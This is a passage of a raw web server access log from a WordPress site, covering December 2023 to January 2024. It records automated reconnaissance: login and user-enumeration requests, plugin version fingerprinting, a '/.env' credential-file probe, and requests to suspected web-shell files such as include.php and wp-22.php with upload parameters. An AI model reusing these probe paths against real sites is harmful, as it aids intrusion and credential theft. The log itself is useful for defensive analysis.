Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 173.236.176.141 - - [12/Dec/2023:23:01:28 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 173.236.176.141 - - [12/Dec/2023:23:01:33 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 173.236.176.141 - - [12/Dec/2023:23:01:37 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 183.136.225.14 - - [13/Dec/2023:01:36:59 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 183.136.225.14 - - [13/Dec/2023:01:37:56 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.14 - - [13/Dec/2023:01:38:01 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.14 - - [13/Dec/2023:01:38:03 +0700] "GET /login.php HTTP/1.1" 301 162 "http://103.153.2.236:8880" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.14 - - [13/Dec/2023:01:38:08 +0700] "GET /login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.14 - - [13/Dec/2023:01:38:19 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 91.92.252.169 - - [13/Dec/2023:22:54:58 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Dec/2023:22:55:15 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Dec/2023:22:55:27 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Dec/2023:22:55:40 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Dec/2023:22:55:51 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Dec/2023:22:56:01 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 198.71.240.28 - - [14/Dec/2023:02:06:39 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.71.240.28 - - [14/Dec/2023:02:06:43 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.71.240.28 - - [14/Dec/2023:02:06:47 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 65.154.226.169 - - [14/Dec/2023:10:32:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 65.154.226.169 - - [14/Dec/2023:10:34:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 145.220.91.19 - - [14/Dec/2023:17:12:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x" 65.154.226.168 - - [14/Dec/2023:17:21:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 52.53.164.202 - - [15/Dec/2023:01:50:32 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/date-time-picker-for-contact-form-7/assets/js/jquery.datetimepicker.full.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4889.0 Safari/537.36" 52.53.164.202 - - [15/Dec/2023:01:51:45 +0700] "GET //wp.lautnusantara.com/wp-content/themes/matina-news/assets/library/sticky/jquery.sticky.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 91.92.252.169 - - [15/Dec/2023:12:49:47 +0700] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 128.199.64.114 - - [16/Dec/2023:08:17:33 +0700] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 128.199.64.114 - - [16/Dec/2023:08:17:34 +0700] "GET /old/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 128.199.64.114 - - [16/Dec/2023:08:17:34 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 128.199.64.114 - - [16/Dec/2023:08:17:34 +0700] "GET /OLD/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 27.111.82.74 - - [16/Dec/2023:09:22:18 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 27.111.82.74 - - [16/Dec/2023:09:22:23 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 27.111.82.74 - - [16/Dec/2023:09:22:25 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 199.45.154.49 - - [16/Dec/2023:14:18:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 91.92.252.169 - - [17/Dec/2023:00:26:13 +0700] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 192.169.147.248 - - [17/Dec/2023:23:18:58 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 192.169.147.248 - - [17/Dec/2023:23:19:03 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 192.169.147.248 - - [17/Dec/2023:23:19:07 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 94.156.64.127 - - [19/Dec/2023:11:33:33 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 45.125.239.179 - - [22/Dec/2023:02:57:21 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.125.239.179 - - [22/Dec/2023:02:57:25 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.125.239.179 - - [22/Dec/2023:02:57:28 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 157.245.38.3 - - [22/Dec/2023:12:04:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 198.235.24.37 - - [24/Dec/2023:08:05:44 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 67.205.12.218 - - [24/Dec/2023:23:27:23 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 67.205.12.218 - - [24/Dec/2023:23:27:28 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 67.205.12.218 - - [24/Dec/2023:23:27:33 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [26/Dec/2023:17:12:07 +0700] "POST /wp.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:07 +0700] "POST /wp.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:07 +0700] "POST /ayk.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:08 +0700] "POST /ayk.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:08 +0700] "POST /geju.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:09 +0700] "POST /geju.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:09 +0700] "POST /wp-content/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:10 +0700] "POST /wp-content/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:10 +0700] "POST /wp-content/plugins/about.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [26/Dec/2023:17:12:11 +0700] "POST /wp-content/plugins/about.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 68.178.149.31 - - [26/Dec/2023:20:02:35 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 68.178.149.31 - - [26/Dec/2023:20:02:39 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 68.178.149.31 - - [26/Dec/2023:20:02:41 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 183.136.225.44 - - [28/Dec/2023:19:22:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 183.136.225.44 - - [28/Dec/2023:19:22:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 64.90.48.187 - - [28/Dec/2023:21:26:07 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.90.48.187 - - [28/Dec/2023:21:26:12 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.90.48.187 - - [28/Dec/2023:21:26:15 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 101.32.224.160 - - [29/Dec/2023:07:40:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 150.109.183.135 - - [29/Dec/2023:07:40:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 199.45.154.49 - - [29/Dec/2023:12:11:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 91.92.252.169 - - [30/Dec/2023:05:36:12 +0700] "GET /wp-content/plugins/royal-elementor-addons/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:36:21 +0700] "GET /wp-content/plugins/email-posts-to-subscribers/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:36:25 +0700] "GET /wp-content/plugins/forminator/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:36:32 +0700] "GET /wp-content/plugins/ht-mega-for-elementor/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:36:40 +0700] "GET /wp-content/plugins/wp-post-author/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:36:47 +0700] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:36:57 +0700] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:04 +0700] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:11 +0700] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:17 +0700] "GET /wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:22 +0700] "GET /wp-content/plugins/wp-email-capture/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:25 +0700] "GET /wp-content/plugins/zendrop-dropshipping-and-fulfillment/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:29 +0700] "GET /complete-order/?selected_package=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:33 +0700] "GET /wp-content/plugins/wp-sms/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:36 +0700] "GET /wp-content/plugins/ninja-forms/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:43 +0700] "GET /wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [30/Dec/2023:05:37:52 +0700] "GET /wp-content/plugins/wp-automatic/changelog HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 198.235.24.204 - - [30/Dec/2023:06:01:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 39.101.185.186 - - [30/Dec/2023:10:56:41 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.101.185.186 - - [30/Dec/2023:10:56:46 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.101.185.186 - - [30/Dec/2023:10:56:50 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 205.210.31.180 - - [01/Jan/2024:09:18:01 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 34.247.190.187 - - [01/Jan/2024:23:43:20 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 199.45.154.19 - - [03/Jan/2024:20:15:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 205.210.31.138 - - [04/Jan/2024:03:11:46 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 185.70.95.8 - - [04/Jan/2024:05:01:40 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 185.70.95.8 - - [04/Jan/2024:05:01:43 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 185.70.95.8 - - [04/Jan/2024:05:01:47 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [04/Jan/2024:07:15:33 +0700] "GET /wp-22.php?sfilename=ovatools.php&sfilecontent=&supfiles= HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [04/Jan/2024:20:30:17 +0700] "GET /wp-22.php?sfilename=ovatools.php&sfilecontent=&supfiles= HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Jan/2024:10:05:16 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Jan/2024:10:05:28 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Jan/2024:10:05:37 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Jan/2024:10:05:54 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Jan/2024:10:06:06 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [05/Jan/2024:10:06:15 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 188.166.13.201 - - [05/Jan/2024:21:54:53 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 91.92.252.169 - - [07/Jan/2024:21:50:57 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [07/Jan/2024:21:51:14 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [07/Jan/2024:21:51:26 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [07/Jan/2024:21:51:42 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [07/Jan/2024:21:52:01 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [07/Jan/2024:21:52:18 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 